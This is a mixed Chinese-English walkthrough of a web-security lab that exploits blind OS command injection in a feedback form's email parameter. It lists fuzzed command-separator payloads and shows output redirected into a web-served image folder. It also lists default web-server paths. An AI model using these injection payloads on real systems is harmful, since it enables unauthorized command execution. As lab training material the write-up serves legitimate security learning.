实验目的

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:

/var/www/images/

The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.

To solve the lab, execute the whoami command and retrieve the output.

官方WP

1. Use Burp Suite to intercept and modify the request that submits feedback.

2. Modify the email parameter, changing it to:

   email=||whoami>/var/www/images/output.txt||
3. Now use Burp Suite to intercept and modify the request that loads an image of a product.

4. Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:

   filename=output.txt
5. Observe that the response contains the output from the injected command.

---

实验步骤

• 进入实验室，点击右上角的`Submit feedback`

• 在反馈表中填入相关信息

• 使用Yakit进行抓包

• 针对email参数进行RCE命令注入FUZZ

• 将请求id从小到大排序，观察延迟突然变大的请求

由上图可见，从第8个请求到第9个请求延迟增长跨度大，因此该Payload很可能为有效RCE的间隔符

• 提取出疑似有效Payload

email=test%40test.com%0Aping+-c+5+127.0.0.1;

email=test%40test.com;ping+-c+5+127.0.0.1;

email=test%40test.com|ping+-c+5+127.0.0.1;

email=test%40test.com;ping+-c+5+127.0.0.1||

email=test%40test.com||ping+-c+5+127.0.0.1||

email=test%40test.com||ping+-c+5+127.0.0.1|

email=test%40test.com;ping+-c+5+127.0.0.1%0A

email=test%40test.com||ping+-c+5+127.0.0.1%0A

• 单独取出Payload进行测试可见email参数处确实存在RCE漏洞

• 尝试直接执行whoami发现无回显

• 尝试RCE直接通过DNSLOG外带发现不出网，那就尝试RCE写文件。接下来需要针对Apache、Nginx、IIS等常见Web服务器类型进行不同路径的写入尝试

一、Apache HTTP Server

1. Linux/macOS

• 默认网站目录：
  • Ubuntu/Debian：/var/www/html
  • CentOS/RHEL：/var/www/html
  • macOS：/usr/local/var/www
• 配置文件：
  • Ubuntu/Debian：/etc/apache2/apache2.conf
  • CentOS/RHEL：/etc/httpd/conf/httpd.conf
  • macOS：/usr/local/etc/apache2/2.4/httpd.conf

2. Windows

• 默认网站目录：C:\Apache24\htdocs
• 配置文件：C:\Apache24\conf\httpd.conf

二、Nginx

1. Linux/macOS

• 默认网站目录：
  • Ubuntu/Debian：/var/www/html
  • CentOS/RHEL：/usr/share/nginx/html
  • macOS：/usr/local/var/www
• 配置文件：
  • Ubuntu/Debian：/etc/nginx/sites-available/default
  • CentOS/RHEL：/etc/nginx/conf.d/default.conf
  • macOS：/usr/local/etc/nginx/nginx.conf

2. Windows

• 默认网站目录：C:\nginx\html
• 配置文件：C:\nginx\conf\nginx.conf

三、IIS（Internet Information Services）

Windows（所有版本）

• 默认网站目录：C:\inetpub\wwwroot
• 配置文件：
  • IIS 7+：%WINDIR%\System32\inetsrv\config\applicationHost.config
  • 管理工具：通过 “Internet Information Services (IIS) 管理器” 图形界面修改

PS：以上信息由大模型直接生成

• 观察到实验室主页存在大量图片，尝试直接查找这些图片URL

• 使用新建标签页打开任意图片

• 尝试直接构造命令将文件写入`/var/www/images`目录中

• 尝试直接访问test.txt文件发现成功写入

• 尝试直接读取当前用户名

• 完成该实验